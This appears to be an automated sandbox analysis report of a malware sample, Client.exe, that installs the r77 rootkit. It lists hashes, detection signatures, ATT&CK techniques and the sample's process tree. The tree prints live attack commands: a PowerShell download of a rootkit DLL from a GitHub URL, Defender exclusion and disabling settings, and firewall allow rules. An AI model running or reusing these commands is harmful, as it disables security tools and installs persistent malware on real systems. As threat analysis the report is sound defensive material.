Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
19-08-2024 00:54
Static task
static1
Behavioral task
behavioral1
Sample
Client.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
Client.exe
Resource
win10v2004-20240802-en
General
-
Target
Client.exe
-
Size
34KB
-
MD5
de2ff0cf683f97d87c97a84a0bdeb49e
-
SHA1
52a3d2012d8dde1e131f4c8e060d193e2f1237cf
-
SHA256
62566a803d4f1d485a6df2a9fcd7af4861631e77785b973844e668dda51c74f0
-
SHA512
56c169cdf07c47ca5e0c51507c0c02b1d01a183c9536eb74eeb2e432cf954812a37a9af2974f0cc48cc5e2dadbab73c530e82e2048163c1c3389848b8e58da4e
-
SSDEEP
768:QpNkDJkjKB41eZuT0dm9joyZwPhtbPn9BX3qJKhSdN38:kNkDNB41eZw9jonR/9N3qJKhsh8
Malware Config
Extracted
https://github.com/NGROKC/CTC/raw/main/CTC64.dll
Signatures
-
Contains code to disable Windows Defender 2 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource yara_rule behavioral2/memory/2044-1-0x0000000000030000-0x000000000003E000-memory.dmp disable_win_def C:\ProgramData\Windows Security\$77-Windows Security Notification.exe disable_win_def -
Processes:
$77-Windows Security Notification.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" $77-Windows Security Notification.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" $77-Windows Security Notification.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection $77-Windows Security Notification.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" $77-Windows Security Notification.exe -
r77 rootkit payload 1 IoCs
Detects the payload of the r77 rootkit.
Processes:
resource yara_rule C:\ProgramData\Windows Security\r77-x64.dll r77_payload -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 33 4400 powershell.exe 35 4400 powershell.exe -
Downloads MZ/PE file
-
Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
-
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 4744 netsh.exe 1056 netsh.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
$77-Windows Security Notification.exeClient.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation $77-Windows Security Notification.exe Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation Client.exe -
Drops startup file 2 IoCs
Processes:
$77-Windows Security Notification.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-Windows Security Notification.exe $77-Windows Security Notification.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-Windows Security Notification.exe $77-Windows Security Notification.exe -
Executes dropped EXE 1 IoCs
Processes:
$77-Windows Security Notification.exepid process 1872 $77-Windows Security Notification.exe -
Loads dropped DLL 4 IoCs
Processes:
taskmgr.exepid process 4708 2452 4428 3980 taskmgr.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
$77-Windows Security Notification.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features $77-Windows Security Notification.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" $77-Windows Security Notification.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
$77-Windows Security Notification.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77-Windows Security Notification = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-Windows Security Notification.exe" $77-Windows Security Notification.exe Set value (str) \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\$77-Windows Security Notification = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-Windows Security Notification.exe" $77-Windows Security Notification.exe -
Processes:
powershell.exepowershell.exepid process 4400 powershell.exe 4752 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exedescription ioc process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
Client.exeexplorer.exe$77-Windows Security Notification.exenetsh.exepowershell.exenetsh.execmd.exepowershell.exepowershell.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Client.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language $77-Windows Security Notification.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exetaskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe -
Modifies registry class 5 IoCs
Processes:
taskmgr.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU taskmgr.exe Set value (data) \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots taskmgr.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
taskmgr.exepowershell.exepowershell.exepowershell.exepid process 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 4400 powershell.exe 4400 powershell.exe 4400 powershell.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 4072 powershell.exe 4072 powershell.exe 4752 powershell.exe 4752 powershell.exe 4072 powershell.exe 4752 powershell.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 16 IoCs
Processes:
taskmgr.exepowershell.exepowershell.exepowershell.exe$77-Windows Security Notification.exetaskmgr.exedescription pid process Token: SeDebugPrivilege 2336 taskmgr.exe Token: SeSystemProfilePrivilege 2336 taskmgr.exe Token: SeCreateGlobalPrivilege 2336 taskmgr.exe Token: SeDebugPrivilege 4400 powershell.exe Token: SeDebugPrivilege 4072 powershell.exe Token: SeDebugPrivilege 4752 powershell.exe Token: SeDebugPrivilege 1872 $77-Windows Security Notification.exe Token: 33 1872 $77-Windows Security Notification.exe Token: SeIncBasePriorityPrivilege 1872 $77-Windows Security Notification.exe Token: 33 2336 taskmgr.exe Token: SeIncBasePriorityPrivilege 2336 taskmgr.exe Token: SeDebugPrivilege 3980 taskmgr.exe Token: SeSystemProfilePrivilege 3980 taskmgr.exe Token: SeCreateGlobalPrivilege 3980 taskmgr.exe Token: 33 3980 taskmgr.exe Token: SeIncBasePriorityPrivilege 3980 taskmgr.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
taskmgr.exepid process 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
taskmgr.exepid process 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe 2336 taskmgr.exe -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
Client.exeexplorer.exe$77-Windows Security Notification.execmd.exedescription pid process target process PID 2044 wrote to memory of 2968 2044 Client.exe explorer.exe PID 2044 wrote to memory of 2968 2044 Client.exe explorer.exe PID 2044 wrote to memory of 2968 2044 Client.exe explorer.exe PID 1296 wrote to memory of 1872 1296 explorer.exe $77-Windows Security Notification.exe PID 1296 wrote to memory of 1872 1296 explorer.exe $77-Windows Security Notification.exe PID 1296 wrote to memory of 1872 1296 explorer.exe $77-Windows Security Notification.exe PID 1872 wrote to memory of 4744 1872 $77-Windows Security Notification.exe netsh.exe PID 1872 wrote to memory of 4744 1872 $77-Windows Security Notification.exe netsh.exe PID 1872 wrote to memory of 4744 1872 $77-Windows Security Notification.exe netsh.exe PID 1872 wrote to memory of 1056 1872 $77-Windows Security Notification.exe netsh.exe PID 1872 wrote to memory of 1056 1872 $77-Windows Security Notification.exe netsh.exe PID 1872 wrote to memory of 1056 1872 $77-Windows Security Notification.exe netsh.exe PID 1872 wrote to memory of 4436 1872 $77-Windows Security Notification.exe cmd.exe PID 1872 wrote to memory of 4436 1872 $77-Windows Security Notification.exe cmd.exe PID 1872 wrote to memory of 4436 1872 $77-Windows Security Notification.exe cmd.exe PID 4436 wrote to memory of 4400 4436 cmd.exe powershell.exe PID 4436 wrote to memory of 4400 4436 cmd.exe powershell.exe PID 4436 wrote to memory of 4400 4436 cmd.exe powershell.exe PID 1872 wrote to memory of 4752 1872 $77-Windows Security Notification.exe powershell.exe PID 1872 wrote to memory of 4752 1872 $77-Windows Security Notification.exe powershell.exe PID 1872 wrote to memory of 4752 1872 $77-Windows Security Notification.exe powershell.exe PID 1872 wrote to memory of 4072 1872 $77-Windows Security Notification.exe powershell.exe PID 1872 wrote to memory of 4072 1872 $77-Windows Security Notification.exe powershell.exe PID 1872 wrote to memory of 4072 1872 $77-Windows Security Notification.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Client.exe"C:\Users\Admin\AppData\Local\Temp\Client.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe" C:\ProgramData\Windows Security\$77-Windows Security Notification.exe2⤵
- System Location Discovery: System Language Discovery
PID:2968
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2336
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:1296 -
C:\ProgramData\Windows Security\$77-Windows Security Notification.exe"C:\ProgramData\Windows Security\$77-Windows Security Notification.exe"2⤵
- Modifies Windows Defender Real-time Protection settings
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\ProgramData\Windows Security\$77-Windows Security Notification.exe" "$77-Windows Security Notification.exe" ENABLE3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4744
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\ProgramData\Windows Security\$77-Windows Security Notification.exe" "$77-Windows Security Notification.exe" ENABLE3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1056
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Rot.bat" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/CTC64.dll','C:\ProgramData\Windows Security\r77-x64.dll');exit4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4400
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,vbs,bat,hta,lnk,dll,ps1;exit3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4752
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4072
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3736
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:3980
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
2AppInit DLLs
1Netsh Helper DLL
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
2AppInit DLLs
1Netsh Helper DLL
1Defense Evasion
Impair Defenses
3Disable or Modify System Firewall
1Disable or Modify Tools
2Modify Registry
3Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
34KB
MD5de2ff0cf683f97d87c97a84a0bdeb49e
SHA152a3d2012d8dde1e131f4c8e060d193e2f1237cf
SHA25662566a803d4f1d485a6df2a9fcd7af4861631e77785b973844e668dda51c74f0
SHA51256c169cdf07c47ca5e0c51507c0c02b1d01a183c9536eb74eeb2e432cf954812a37a9af2974f0cc48cc5e2dadbab73c530e82e2048163c1c3389848b8e58da4e
-
Filesize
147KB
MD51b8bd653321cf3cbc786e563555fbc75
SHA15638efe0476c8c1b74c6604db419be814d1d90a0
SHA256919a332e85d7c32a6f0a1bdd15b211b8b273b73fe05a553ea0f230a0958586c7
SHA512bafdbc8413828c5427983fa0e9403a2d9a88d0ad2f27f92842310852d273f2d2c9a0c6f9f64e1aac03fadf49f9a3bcf58c6b7c8b06debcce46536114cde0175b
-
Filesize
64KB
MD5d2fb266b97caff2086bf0fa74eddb6b2
SHA12f0061ce9c51b5b4fbab76b37fc6a540be7f805d
SHA256b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
SHA512c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8
-
Filesize
4B
MD5f49655f856acb8884cc0ace29216f511
SHA1cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA2567852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8
-
Filesize
944B
MD56bd369f7c74a28194c991ed1404da30f
SHA10f8e3f8ab822c9374409fe399b6bfe5d68cbd643
SHA256878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d
SHA5128fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93
-
Filesize
1KB
MD54280e36a29fa31c01e4d8b2ba726a0d8
SHA1c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4
-
Filesize
18KB
MD5cd9d129ba93ef793c9cb5fb06bb7f268
SHA1fe17b23010cad05f5ce852c0f4c05b73faf2c26c
SHA25681d9328f68a681c27cbe9b4cf56c53af6b91d7f53b720d8f266710dc862c0317
SHA512bfe9c931adaabbea39389ca948bdef3cb4c0b54dbc41a700b8ede86b6b9f267eda4dbe1fcd9682c067ef9ea61ed1f6d5000e55018559c0f850802ff812a40a26
-
Filesize
16KB
MD5c159923b1e743d24edaa87ab2fa13933
SHA10f95f1f56141fe81c1629bc8b0db3ec3c446bc1c
SHA256d4db5fa1e75a3b953dd63059cc0e34b7e0ccbc7ed8e7d59249aab889c2331970
SHA512d1ccfe98040c11f97e1e238cd691986231b7146d8be470e72f58a919f2649834c8a1a0a23527ea0d49980fa47b8aa9f7af3b2f601e97669de0c70de8bf80258d
-
Filesize
251B
MD5eb42fd6dc5814aaaad5ae381e4c64cae
SHA19fc6655c50b8543fcab600256d104c33bc37f6bb
SHA256ae65c56a9718326d6899262eea15044cf418b341472645098f68b6e3f0729068
SHA512e2d7e8853a29b4a55d4797b3e340631d14af83e0bff3f2521b56a2435b92dbc2f5d101dbd4f516d23f6b136c62d65f1a9bd47268e0f209108967b85e3b70b17a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82